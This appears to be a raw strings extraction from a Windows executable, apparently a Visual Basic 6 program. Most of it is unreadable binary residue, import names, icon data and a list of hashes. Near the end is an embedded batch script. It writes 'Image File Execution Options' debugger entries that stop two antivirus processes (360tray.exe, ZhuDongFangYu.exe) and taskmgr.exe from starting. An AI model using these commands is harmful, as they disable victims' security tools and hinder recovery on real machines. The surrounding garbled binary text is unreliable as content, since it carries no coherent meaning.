PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X }qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
I x@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
kkggfffl
{kgfvfffffl
gffffff
{kkfvfffffl
wvffffff{;s{vffffl
7'{kkfgwffff
3fwwfrfffl
k{kvp*ffff
2*gg2*jfff;"f{{kc2ffffl
2*j{"jfffl
;3"*w{p*fff
"g{0*jfff333
wff;30
"j{3""wffs33
""c2*"{fgl
"*z"3wffl7;;;30
" 3wfvl
{kffs;30
*#7fg|;3;3
*#{{wkwv|{;3;;30*gw|
{kkgg|{3;33
jgw;32{g|s3;;;0***g;333
"*{s332"
"*;{;3
"3;33{
#3;3;;;3{
7033ws333;;;;;
{{{{{{
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
vvvfff
wffffl
w{kffvff
2{wwvffl
0*kkvpffl
"ws*ffl3
"*k0vls0
"*2"vf;;3
wffs330
{{wk{;;32g
330*gks3
"s0"*#0
;;33;{w3
33w73;;;7{{{{{{{|
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
wgvl2{pf
l;0*vl30'l332gl30*{
0#233;70?kk
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
\djpx~HHVZdjs~@@HV\fs~LBHHQYamxBBLLQQVYdjs~FFLLLH@HSXZdmxFFFBB;;3<CUSYajs~DDD<<333*=ieUV\fpxD><<5%%%
^XZdms~N>>5%%%
$cYajsxNC>5
r[afpx~C>8*
cZdjsxzNC8'
n[\djs{}
cY\flzq
nXY\ce
GgLTW`
q}z]O:"
_enuv~]O:"
hi^ckmpsx]O:
i^[\adfjm~~gW:
^XYYZ\\dpxo]=)
.TQQVVVYfxso]K1
rHHHHQQZp~xpogW=)
^@@@@HVfsppoW=1
o;3;;Q\jfoeK=
<33HVadooW=1
C3@QYdweK7
i>HQVtoWI$
R>LVZweWR
-:<LVtweIE.J
>FSbwteRE.J
M$8<LXyteRE.J
.M$6<FS
teRE.J
weREMJ
yei_`G
!0:9CDTyytiqh`-
(29?CNUw
|}iqRK=:000//+449??NNUUw
|teeWWOAAAAOOPPPPUUty
yoggg]]]^^^^^^orrrrrnnn^^
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
cjpw~IIQcs~DDDIQcp{E>>336JNUjs~B66-)0uWM_m{B6-&
!khUjs|8)
h_lt=2#
S^hlow~\C
uTV__j{weC+
vNKMUp~seR9
WEIcsmaa9'
fEQjcnH1
FKUnb?(
CDKbq^S.
58DMqvgX
2>GyxgXiX
,+6EbyxgXi
.,'8ENfyxgk
/18BLfyvu}k@!
+1<ABLqxt^H<772::=FJJ]qyrne`\OWWWJJ\eedddWO
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
2DJMQ ;8HLSWU
]?9IO\V
iz7>v}X
ok~dbsYQ
lqwKNM
e|4:HJ#
c`r@'0E-
u`_dh{Z(6")mga^Rnx%=.pjfy
lt,&CB
*$<71/+8?!k
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
DDDDDD
DDDDDD
DDDDDD
[xe<P(
[xe<P]
&N(W}/eJX-N8eQ`@bv
000000
000000
NfM0$P(
S0n0$Pn0
0L0Lc0f0O0`0U0D0
n0e[0000
O(uY00k0o0
0eW0D0$P0
O(uY00k0o0
NfM0$P]
0xbW0f0]0n0$P0eQRW0f0O0`0U0D0
BE772A5815A5087495005CFAEF05E050
9B38B5EBD92445D673B002A8CBE953D0
4252AC441217A0AB1EBBE9F2C1D5036F
4252AC441217A0AB1EBBE9F2C1D5036F
B538968EC4C5940D395F6FEC4078B080
EE8CDB9E62F6AB53C7C3241B2E3F49ED
CBC3103851B254409688A6F785D9F21A
C5D7ACC95340E068E4007664183DAD7C
D844D4B560FB9CBEE2800DF7C509A63D
FB38C2BA2A06016788A582611FCCC761
D8BF62A792C73BCC152A16EA7A34009F
ECDDAA2994A26F48C74AA459CB903A23
95E2FF5F9B55DC933BA0939EA3D41E0B
1DB684FD96EAC6F83F7C610B0E59BC3C
4F989CDC9DB79932D15CD266D7107495
885BDEB0871A6F42C34B43FE6C4AB3D7
A7AC0723B46256E1910A5249F965B9BA
0A5E5F7BB40DC4473498137A9946EF85
15E63336E13D37EE1ECDFBAE19E8B625
4FE7E777741336685F848A95051C2EC9
E18363315A661FA8603D458E5D5FD1D9
492CB2EBF8AAC15FF665E65D80379296
D1832484991ED384453E78995E4175D1
21F77A36A1618EAB9A390DA2E01D0863
B9EF236F12D844B98FDF59F0B7C4120C
470EC970E94973EB96C25D1932A62A1A
5D5F8C08527E4C31A0ECBE48C638243A
5D5F8C08527E4C31A0ECBE48C638243A
F06DC8A0103C5178C4B9C950B8B27477
E445C5A252AF3CFDD4E5BBD5E54D6F9B
587EE20D8E3F1ED9F5527628180CC99F
30BCFC9A58F487D2839053A75C026640
DD30DB4651F1F67ACB6B34B61519343C
954251F477538BBEFFEB8C5954FF86D3
9C4A2B88FB7C7476226A571707846B88
71636ACFCBD1C2CDF519B7D5B54A5E8F
3B2CBF68961767627E63727D32A0DBF8
87A1F20FC353CEBC27675A8C13F2525A
534435865D2F21A754D77ACC09197D12
FA0AB87CC620BEC3ABD5D38BE87B2B63
4B8C757F4E7B9D9740E4D795D5128BAC
10514C6757143FC21F9EAACF553A48A4
142D51BEC919C34415BD319273BE4BCE
D20B63D406CACA1D93A3A795D3CDE2A9
479E793FEF3DBA30E8C3F90F0E2ED32F
456EAA00786A22128823292E5EF01B87
4216E42459AD04E98578B5953EABD91C
4216E42459AD04E98578B5953EABD91C
67C1F0D510BC852937CE110BC39B4EF7
718BAAB942C2EB1899AEB1C25913BB45
CCC5C9D272A2B1642ADDAD15AE9D8E96
6ABAA2736F2B0D2D770C705264A6F2A8
BB0AA9C5AC1F4DB67466CE45953E1F2C
02189D6C426766972A81547B97D4F95A
5489C65A20E8262E0436D1F2D14D6B07
010F0C8A8242EC1AF95AF58D9D8151E7
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlr r
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
